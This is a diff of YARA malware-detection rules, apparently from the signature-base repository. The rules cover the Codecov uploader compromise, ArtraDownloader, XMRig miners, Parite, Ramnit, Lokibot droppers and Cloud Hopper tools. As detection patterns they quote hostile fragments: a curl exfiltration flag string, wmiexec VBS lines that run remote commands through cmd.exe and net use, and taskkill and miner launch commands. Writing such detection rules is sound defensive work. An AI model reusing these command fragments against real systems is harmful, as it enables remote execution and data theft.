-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cloudhopper.yar#L224-L240"
+		reference = "https://about.codecov.io/security-update/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_codecov_hack.yar#L2-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7935d3aeef0d4c94a00dd44942a1ba97d0c9fce848914ebc9c59d9f8e9f51599"
+		logic_hash = "1aa7723982a1b675ba6694f1af0eb28e5926b974874580bd727cf33a3f8d893a"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a80f6c57f772f20d63021c8971a280c19e8eafe7cc7088344c598d84026dda15"
 
 	strings:
-		$x1 = "IOGVWDWCXZVRHTE" fullword ascii
-		$op1 = { c9 c3 56 6a 00 8b f1 6a 64 e8 dd 34 00 00 c7 06 }
-		$op2 = { 68 38 00 41 00 68 34 00 41 00 e8 d3 }
+		$a1 = "Global report uploading tool for Codecov"
+		$s1 = "curl -sm 0.5 -d"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them )
+		uint16( 0 ) == 0x2123 and filesize < 70KB and all of them
 }
-rule SIGNATURE_BASE_Opcloudhopper_Lockdown : FILE
+rule SIGNATURE_BASE_APT_Artradownloader2_Aug19_1 : FILE
 {
 	meta:
-		description = "Tools related to Operation Cloud Hopper"
+		description = "Detects ArtraDownloader malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0500f19c-597b-5904-8401-35236215ff29"
-		date = "2017-04-07"
+		id = "0e688e92-2366-5f36-a32d-083982181eb7"
+		date = "2019-08-27"
 		modified = "2023-12-05"
-		reference = "https://github.com/maaaaz/impacket-examples-windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cloudhopper.yar#L251-L265"
+		reference = "https://unit42.paloaltonetworks.com/multiple-artradownloader-variants-used-by-bitter-to-target-pakistan/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_patchwork.yar#L2-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3f24c08817bc94bb4b7d09d51bed62f43952f2c66338f29c4bc8e9000b3ff78a"
+		logic_hash = "c365c3d678c881eeb626b5d26e6164b473990387619337459ccdd8d9f0633b49"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8ca61cef74573d9c1d19b8191c23cbd2b7a1195a74eaba037377e5ee232b1dc5"
+		hash1 = "f0ef4242cc6b8fa3728b61d2ce86ea934bd59f550de9167afbca0b0aaa3b2c22"
 
 	strings:
-		$s1 = "lockdown.dll" fullword ascii
-		$s3 = "mfeann.exe" fullword ascii
+		$xc1 = { 47 45 54 20 25 73 20 48 54 54 50 2F 31 2E 30 00
+               0D 0A 00 00 48 6F 73 74 3A 20 25 73 00 00 00 00
+               3F 61 3D 00 26 62 3D 00 26 63 3D 00 26 64 3D 00
+               26 65 3D 00 25 32 30 }
+		$xc2 = { 25 73 20 25 73 20 25 73 0D 0A 25 73 20 25 73 0D
+               0A 25 73 25 73 0D 0A 25 73 25 73 0D 0A 25 73 20
+               25 64 0D 0A 0D 0A 25 73 00 00 00 00 71 72 79 3D }
+		$xc3 = { 49 44 3D 25 73 00 00 00 3A 00 00 00 25 73 20 25
+               73 20 25 73 0D 0A 25 73 20 25 73 0D 0A 25 73 25
+               73 0D 0A 25 73 25 73 0D 0A 43 6F 6E 74 65 6E 74
+               2D 6C 65 6E 67 74 68 25 73 20 25 64 }
+		$xc4 = { 25 73 20 25 73 20 25 73 0D 0A 25 73 20 25 73 0D
+               0A 25 73 25 73 0D 0A 25 73 25 73 0D 0A 43 6F 6E
+               74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 25 64 0D
+               0A 0D 0A 25 73 }
+		$x1 = "Tpguxbsf]Njdsptpgu" ascii
+		$x2 = ".gpsn.vsmfodpefe" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 600KB and 1 of them
 }
-rule SIGNATURE_BASE_Opcloudhopper_Windowxarbot : FILE
+
+rule SIGNATURE_BASE_MAL_XMR_Miner_May19_1 : HIGHVOL FILE
 {
 	meta:
-		description = "Malware related to Operation Cloud Hopper"
+		description = "Detects Monero Crypto Coin Miner"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4434632a-1886-5e8b-a205-12220263980a"
-		date = "2017-04-07"
+		id = "233d1d47-de67-55a9-ae7e-46b5dd34e6ce"
+		date = "2019-05-31"
 		modified = "2023-12-05"
-		reference = "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cloudhopper.yar#L267-L279"
+		reference = "https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_nansh0u.yar#L15-L36"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5d8a9c25032c5371e843f8e80884e43a64c73b1644605b39b2dff11104c3bbcd"
-		score = 75
+		logic_hash = "85a65fd2355850b7f5261ad41091e181562938356ba3dae7d867f7ac8922a16e"
+		score = 85
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "HIGHVOL, FILE"
+		hash1 = "d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc"
 
 	strings:
-		$s1 = "\\Release\\WindowXarbot.pdb" ascii
+		$x1 = "donate.ssl.xmrig.com" fullword ascii
+		$x2 = "* COMMANDS     'h' hashrate, 'p' pause, 'r' resume" fullword ascii
+		$s1 = "[%s] login error code: %d" fullword ascii
+		$s2 = "\\\\?\\pipe\\uv\\%p-%lu" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 14000KB and ( pe.imphash ( ) == "25d9618d1e16608cd5d14d8ad6e1f98e" or 1 of ( $x* ) or 2 of them )
 }
-rule SIGNATURE_BASE_Opcloudhopper_Wmidll_Inmemory
+
+rule SIGNATURE_BASE_HKTL_CN_Prochook_May19_1 : FILE
 {
 	meta:
-		description = "Malware related to Operation Cloud Hopper - Page 25"
+		description = "Detects hacktool used by Chinese threat groups"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0afb6e52-bc9a-5a68-890b-79a017e5d554"
-		date = "2017-04-07"
+		id = "ae4e2613-8254-5ea6-af88-2f08ebe4da33"
+		date = "2019-05-31"
 		modified = "2023-12-05"
-		reference = "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cloudhopper.yar#L281-L293"
+		reference = "https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_nansh0u.yar#L38-L49"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6dddda4e519eeaa67eb4c21151cab10553420a23a077751e0fc45fcae0bf6e69"
+		logic_hash = "de55990c130702a05e96ee769707a81ce0ec58a515d75a9a99b20265ce3db682"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-
-	strings:
-		$s1 = "wmi.dll 2>&1" ascii
+		tags = "FILE"
+		hash1 = "02ebdc1ff6075c15a44711ccd88be9d6d1b47607fea17bef7e5e17f8da35293e"
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and pe.imphash ( ) == "343d580dd50ee724746a5c28f752b709"
 }
-rule SIGNATURE_BASE_VBS_Wmiexec_Tool_Apr17_1 : FILE
+rule SIGNATURE_BASE_SUSP_PDB_CN_Threat_Actor_May19_1 : FILE
 {
 	meta:
-		description = "Tools related to Operation Cloud Hopper"
+		description = "Detects PDB path user name used by Chinese threat actors"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8175eb74-38f1-5d8f-a668-aa8e215b032e"
-		date = "2017-04-07"
+		id = "fc6969ed-5fc1-5b3b-9659-c6fc1c9e2f9c"
+		date = "2019-05-31"
 		modified = "2023-12-05"
-		reference = "https://github.com/maaaaz/impacket-examples-windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cloudhopper.yar#L295-L318"
+		reference = "https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_nansh0u.yar#L52-L65"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b0aad1c8dfc07ae3df835ae113bd02abfd706a0646ffcac5dd5691822016d31a"
-		score = 75
+		logic_hash = "adcfe3d4bc6fcaf6be4f70c91fb2150bfa2d61f1ba84f96a0bf0c39ed0380b6a"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "21bc328ed8ae81151e7537c27c0d6df6d47ba8909aebd61333e32155d01f3b11"
+		hash1 = "01c3882e8141a25abe37bb826ab115c52fd3d109c4a1b898c0c78cee8dac94b4"
 
 	strings:
-		$x1 = "strNetUse = \"cmd.exe /c net use \\\\\" & host" fullword ascii
-		$x2 = "localcmd = \"cmd.exe /c \" & command " ascii
-		$x3 = "& \" > \" & TempFile & \" 2>&1\"  '2>&1 err" fullword ascii
-		$x4 = "strExec = \"cmd.exe /c \" & cmd & \" >> \" & resultfile & \" 2>&1\"  '2>&1 err" fullword ascii
-		$x5 = "TempFile = objShell.ExpandEnvironmentStrings(\"%TEMP%\") & \"\\wmi.dll\"" fullword ascii
-		$a1 = "WMIEXEC ERROR: Command -> " ascii
-		$a2 = "WMIEXEC : Command result will output to" fullword ascii
-		$a3 = "WMIEXEC : Target ->" fullword ascii
-		$a4 = "WMIEXEC : Login -> OK" fullword ascii
-		$a5 = "WMIEXEC : Process created. PID:" fullword ascii
+		$x1 = "C:\\Users\\zcg\\Desktop\\" ascii
 
 	condition:
-		( filesize < 40KB and 1 of them ) or 3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and 1 of them
 }
-rule SIGNATURE_BASE_RAT_AAR
+
+rule SIGNATURE_BASE_MAL_Ramnit_May19_1 : FILE
 {
 	meta:
-		description = "Detects AAR RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "42c1af80-cff3-505f-a3cb-35b7e34575e1"
-		date = "2014-01-04"
+		description = "Detects Ramnit malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f8fa3557-556e-5680-9f1a-2ecf118ade75"
+		date = "2019-05-31"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/AAR"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L1-L22"
+		reference = "https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_nansh0u.yar#L67-L78"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a206b3f5cf6cc870135bc267b5baab8333422dc917efce6c66ee907690592d09"
+		logic_hash = "51d574f457c37eba3c29f869e03244b9471be6f6c8319aa0ddfad34be748eb53"
 		score = 75
 		quality = 85
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
-
-	strings:
-		$a = "Hashtable"
-		$b = "get_IsDisposed"
-		$c = "TripleDES"
-		$d = "testmemory.FRMMain.resources"
-		$e = "$this.Icon" wide
-		$f = "{11111-22222-20001-00001}" wide
+		tags = "FILE"
+		hash1 = "d7ec3fcd80b3961e5bab97015c91c843803bb915c13a4a35dfb5e9bdf556c6d3"
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and pe.imphash ( ) == "500cd02578808f964519eb2c85153046"
 }
-rule SIGNATURE_BASE_RAT_Adzok
+rule SIGNATURE_BASE_MAL_Parite_Malware_May19_1 : FILE
 {
 	meta:
-		description = "Detects Adzok RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "93807f85-ae4e-5fd2-9010-ed2cf6f57f38"
-		date = "2015-01-05"
+		description = "Detects Parite malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f4c9da17-9894-5243-828a-827accb0bac5"
+		date = "2019-05-31"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/Adzok"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L24-L48"
+		reference = "https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_nansh0u.yar#L80-L100"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ee3291a4396ba6cb3c5e22229de4f5e45714b29bfeac1c56bde6d038a9d25458"
-		score = 75
+		logic_hash = "b458b05178f18be1e936c1b42bbd91c739f288570fca759b85f1bb143899f1a8"
+		score = 80
 		quality = 85
-		tags = ""
-		Versions = "Free 1.0.0.3,"
-		maltype = "Remote Access Trojan"
-		filetype = "jar"
+		tags = "FILE"
+		hash1 = "c9d8852745e81f3bfc09c0a3570d018ae8298af675e3c6ee81ba5b594ff6abb8"
+		hash2 = "8d47b08504dcf694928e12a6aa372e7fa65d0d6744429e808ff8e225aefa5af2"
+		hash3 = "285e3f21dd1721af2352196628bada81050e4829fb1bb3f8757a45c221737319"
+		hash4 = "b987dcc752d9ceb3b0e6cd4370c28567be44b789e8ed8a90c41aa439437321c5"
 
 	strings:
-		$a1 = "config.xmlPK"
-		$a2 = "key.classPK"
-		$a3 = "svd$1.classPK"
-		$a4 = "svd$2.classPK"
-		$a5 = "Mensaje.classPK"
-		$a6 = "inic$ShutdownHook.class"
-		$a7 = "Uninstall.jarPK"
-		$a8 = "resources/icono.pngPK"
+		$s1 = "taskkill /im cmd.exe /f" fullword ascii
+		$s2 = "LOADERX64.dll" fullword ascii
+		$x1 = "\\dllhot.exe" ascii
+		$x2 = "dllhot.exe --auto --any --forever --keepalive" fullword ascii
 
 	condition:
-		7 of ( $a* )
+		uint16( 0 ) == 0x5a4d and filesize < 10000KB and ( 1 of ( $x* ) or 2 of them )
 }
-rule SIGNATURE_BASE_RAT_Ap0Calypse
+
+rule SIGNATURE_BASE_MAL_Parite_Malware_May19_2 : FILE
 {
 	meta:
-		description = "Detects Ap0calypse RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "a2993654-efa0-519b-b6f6-4d722d93adde"
-		date = "2014-01-04"
+		description = "Detects Parite malware based on Imphash"
+		author = "Florian Roth (Nextron Systems)"
+		id = "33970268-610c-5abf-9e9e-83dae0c81064"
+		date = "2019-05-31"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/Ap0calypse"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L50-L71"
+		reference = "https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_nansh0u.yar#L102-L118"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1ce90a5b1b3f643d4e530d6e00741f5d5918d3199cfbc4126cf8421a9e42023e"
+		logic_hash = "060a26ed6679b7038f1a89385220ad9112d3102023ea9d141332077f79bbe728"
 		score = 75
 		quality = 85
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
-
-	strings:
-		$a = "Ap0calypse"
-		$b = "Sifre"
-		$c = "MsgGoster"
-		$d = "Baslik"
-		$e = "Dosyalars"
-		$f = "Injecsiyon"
+		tags = "FILE"
+		hash1 = "c9d8852745e81f3bfc09c0a3570d018ae8298af675e3c6ee81ba5b594ff6abb8"
+		hash2 = "8d47b08504dcf694928e12a6aa372e7fa65d0d6744429e808ff8e225aefa5af2"
+		hash3 = "285e3f21dd1721af2352196628bada81050e4829fb1bb3f8757a45c221737319"
+		hash4 = "b987dcc752d9ceb3b0e6cd4370c28567be44b789e8ed8a90c41aa439437321c5"
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 18000KB and ( pe.imphash ( ) == "b132a2719be01a6ef87d9939d785e19e" or pe.imphash ( ) == "78f4f885323ffee9f8fa011455d0523d" )
 }
-rule SIGNATURE_BASE_RAT_Arcom
+rule SIGNATURE_BASE_EXPL_Strings_CVE_POC_May19_1 : FILE
 {
 	meta:
-		description = "Detects Arcom RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "a0598340-c4a5-53f0-a810-63e37ec669a5"
-		date = "2014-01-04"
+		description = "Detects strings used in CVE POC noticed in May 2019"
+		author = "Florian Roth (Nextron Systems)"
+		id = "df11e0b1-e907-5a24-a3e7-0e78acb379f7"
+		date = "2019-05-31"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/Arcom"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L72-L93"
+		reference = "https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_nansh0u.yar#L120-L136"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "dbccd9885ba0ec5741e3c74908d2e76b15836bc75373c100f344abf9bdf3a0b4"
-		score = 75
+		logic_hash = "b470e9f5716130d810e519abb8d4e1058b5a806d59ddae53a40cac5597fbb874"
+		score = 80
 		quality = 85
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		tags = "FILE"
+		hash1 = "01c3882e8141a25abe37bb826ab115c52fd3d109c4a1b898c0c78cee8dac94b4"
 
 	strings:
-		$a1 = "CVu3388fnek3W(3ij3fkp0930di"
-		$a2 = "ZINGAWI2"
-		$a3 = "clWebLightGoldenrodYellow"
-		$a4 = "Ancestor for '%s' not found" wide
-		$a5 = "Control-C hit" wide
-		$a6 = {A3 24 25 21}
+		$x1 = "\\Debug\\poc_cve_20" ascii
+		$x2 = "\\Release\\poc_cve_20" ascii
+		$x3 = "alloc fake fail: %x!" fullword ascii
+		$x4 = "Allocate fake tagWnd fail!" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and 1 of them
 }
-rule SIGNATURE_BASE_RAT_Bandook
+rule SIGNATURE_BASE_HKTL_NFS_Fuse_NFS
 {
 	meta:
-		description = "Detects Bandook RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "79fb99d8-bd56-5986-9917-e119b51b8303"
-		date = "2014-01-04"
-		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/bandook"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L95-L120"
+		description = "Detects the nfs-security-tooling fuse_nfs by HvS Consulting"
+		author = "Moritz Oettle"
+		id = "287fbe7d-ee1c-58a4-aa2d-9d9bec8321b4"
+		date = "2024-10-22"
+		modified = "2025-03-20"
+		reference = "https://github.com/hvs-consulting/nfs-security-tooling"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/hktl_HvS_nfs_security_tooling.yar#L1-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "fe658e0990f0d456b1a8f5acea62a3b80bdd4a9bc0eedfe2e1092ea60b4fca2e"
+		logic_hash = "0bd3714b865d77660404e5f3ed1e9c7b55aadc6f58d16761111be57597784686"
 		score = 75
 		quality = 85
 		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
 
 	strings:
-		$a = "aaaaaa1|"
-		$b = "aaaaaa2|"
-		$c = "aaaaaa3|"
-		$d = "aaaaaa4|"
-		$e = "aaaaaa5|"
-		$f = "%s%d.exe"
-		$g = "astalavista"
-		$h = "givemecache"
-		$i = "%s\\system32\\drivers\\blogs\\*"
-		$j = "bndk13me"
+		$s1 = "NFS3ConnectionFactory" fullword ascii
+		$s2 = "fuse_to_nfs_timestamp" fullword ascii
+		$s3 = "--manual-fh" fullword ascii
+		$s4 = "--fake-uid-allow-root" fullword ascii
+		$s5 = "nfs.rpc.credential" fullword ascii
+		$s6 = "nfs.readlink" fullword ascii
+		$s7 = "pyfuse3.EntryAttributes" fullword ascii
+		$s8 = "Make nested exports on NetApp servers work" fullword ascii
+		$s9 = "add_mutually_exclusive_group" fullword ascii
 
 	condition:
-		all of them
+		4 of them
 }
-rule SIGNATURE_BASE_RAT_Blacknix
+rule SIGNATURE_BASE_HKTL_NFS_NFS_Analyze
 {
 	meta:
-		description = "Detects BlackNix RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "d7814184-3ae4-53f1-a602-c3fbc02573c3"
-		date = "2014-01-04"
-		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/BlackNix"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L122-L142"
+		description = "Detects the nfs-security-tooling nfy_analyze by HvS Consulting"
+		author = "Marc Stroebel"
+		id = "3350d0ae-e638-5c8f-a578-ba0ac5521053"
+		date = "2024-10-22"
+		modified = "2025-03-20"
+		reference = "https://github.com/hvs-consulting/nfs-security-tooling"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/hktl_HvS_nfs_security_tooling.yar#L26-L53"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "de8787fd35e6313c061b8759361698b1acd54b215d226839a8702b1a5d189ccb"
+		logic_hash = "83a9e5b5b404bf28b0334611fe4f38227212783cecea3c9996d23cb00cad42ed"
 		score = 75
 		quality = 85
 		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
 
 	strings:
-		$a1 = "SETTINGS" wide
-		$a2 = "Mark Adler"
-		$a3 = "Random-Number-Here"
-		$a4 = "RemoteShell"
-		$a5 = "SystemInfo"
+		$s1 = "no_root_squash_exports" fullword ascii
+		$s2 = "nfs lock manager" fullword ascii
+		$s3 = "netapp partner" fullword ascii
+		$s4 = "xdrdef.mnt3_type" fullword ascii
+		$s5 = "BTRFS subvolumes" fullword ascii
+		$s6 = "Unsupported fsid" fullword ascii
+		$s7 = "nfs3_read_etc_shadow" fullword ascii
+		$s8 = "nfs3_check_no_root_squash" fullword ascii
+		$s9 = "krb5i" fullword ascii
+		$s10 = "nfs4_overview" fullword ascii
+		$s11 = "--btrfs-subvolumes" fullword ascii
+		$s12 = "when escaping a BTRFS export" fullword ascii
+		$s13 = "No NFS server detected" fullword ascii
 
 	condition:
-		all of them
+		6 of them
 }
-rule SIGNATURE_BASE_RAT_Blackshades : BLACKSHADES
+rule SIGNATURE_BASE_Lokibot_Dropper_Scancopypdf_Feb18 : FILE
 {
 	meta:
-		description = "Detects BlackShades RAT"
-		author = "Brian Wallace (@botnet_hunter)"
-		id = "039f9efd-034d-5088-9a2f-7a63ad170d3d"
-		date = "2014-01-04"
+		description = "Auto-generated rule - file Scan Copy.pdf.com"
+		author = "Florian Roth (Nextron Systems)"
+		id = "64c45d91-4e18-5fd1-8d93-b5db4df7da29"
+		date = "2018-02-14"
 		modified = "2023-12-05"
-		reference = "http://blog.cylance.com/a-study-in-bots-blackshades-net"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L144-L161"
+		reference = "https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_loki_bot.yar#L11-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "23f8d52cf92b594f9302d549cf54f37dc0a01b5686da74b72120a8072435abfe"
+		logic_hash = "b9f10a09d91c10731e34dc88f87104693cdc794ddc3c63ee382f976d0a75f30f"
 		score = 75
 		quality = 85
-		tags = "BLACKSHADES"
-		family = "blackshades"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "6f8ff26a5daf47effdea5795cdadfff9265c93a0ebca0ce5a4144712f8cab5be"
 
 	strings:
-		$string1 = "bss_server"
-		$string2 = "txtChat"
-		$string3 = "UDPFlood"
+		$x1 = "Win32           Scan Copy.pdf   " fullword wide
+		$a1 = "C:\\Program Files (x86)\\Microsoft Visual Studio\\VB98\\VB6.OLB" fullword ascii
+		$s1 = "Compiling2.exe" fullword wide
+		$s2 = "Unstalled2" fullword ascii
+		$s3 = "Compiling.exe" fullword wide
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and $x1 or ( $a1 and 1 of ( $s* ) )
 }
-rule SIGNATURE_BASE_RAT_Bluebanana
+rule SIGNATURE_BASE_Lokibot_Dropper_Packed_R11_Feb18 : FILE
 {
 	meta:
-		description = "Detects BlueBanana RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "f00c7e92-f34c-5666-a1d9-02ac2cf7608c"
-		date = "2014-01-04"
+		description = "Auto-generated rule - file scan copy.pdf.r11"
+		author = "Florian Roth (Nextron Systems)"
+		id = "83cd6225-eb6d-5d17-a751-51f20db9c7eb"
+		date = "2018-02-14"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/BlueBanana"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L163-L184"
+		reference = "https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_loki_bot.yar#L33-L46"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0d84bb63d56d876c8b2e7c8c8afeaba839fee41d2d38f16ac9a13e802008179e"
+		logic_hash = "9ca39cac8dcbbbe1697ef96bde60c522bb9cc190c208483220aa96bc672f325a"
 		score = 75
 		quality = 85
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "Java"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029"
 
 	strings:
-		$meta = "META-INF"
-		$conf = "config.txt"
-		$a = "a/a/a/a/f.class"
-		$b = "a/a/a/a/l.class"
-		$c = "a/a/a/b/q.class"
-		$d = "a/a/a/b/v.class"
+		$s1 = "C:\\Program Files (x86)\\Microsoft Visual Studio\\VB98\\VB6.OLB" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x0000 and filesize < 2000KB and 1 of them
 }
-rule SIGNATURE_BASE_RAT_Bozok
+rule SIGNATURE_BASE_MAL_WIPER_Caddywiper_Mar22_1 : FILE
 {
 	meta:
-		description = "Detects Bozok RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "b1d22e8c-39aa-52e7-9ca8-2b35bb82f7de"
-		date = "2014-01-04"
+		description = "Detects CaddyWiper malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "83495a0d-a295-5ec7-9761-ce79918e1034"
+		date = "2022-03-15"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/Bozok"
